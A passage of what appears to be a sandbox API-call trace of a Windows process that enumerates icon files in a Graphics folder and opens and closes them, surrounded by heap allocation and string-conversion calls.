Flags=0x0, Size=0x20) returned 0x88748 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.158] AreFileApisANSI () returned 1 [0062.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0062.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0062.159] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.159] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.160] AreFileApisANSI () returned 1 [0062.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", lpUsedDefaultChar=0x0) returned 48 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.160] AreFileApisANSI () returned 1 [0062.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0062.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0062.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0062.160] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.160] GetFileType (hFile=0x41c) returned 0x1 [0062.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0062.161] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.161] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.161] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.161] CloseHandle (hObject=0x41c) returned 1 [0062.161] AreFileApisANSI () returned 1 [0062.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0062.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0062.161] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.161] GetFileType (hFile=0x41c) returned 0x1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.162] CloseHandle (hObject=0x41c) returned 1 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0062.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0062.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0062.163] AreFileApisANSI () returned 1 [0062.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0062.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0062.163] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.163] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0062.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.164] AreFileApisANSI () returned 1 [0062.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico", lpUsedDefaultChar=0x0) returned 40 [0062.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.165] AreFileApisANSI () returned 1 [0062.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0062.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d2c0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0062.165] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.165] GetFileType (hFile=0x41c) returned 0x1 [0062.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0062.165] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.165] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.165] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.166] CloseHandle (hObject=0x41c) returned 1 [0062.166] AreFileApisANSI () returned 1 [0062.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0062.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6cce8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0062.166] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.166] GetFileType (hFile=0x41c) returned 0x1 [0062.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0062.166] CloseHandle (hObject=0x41c) returned 1 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 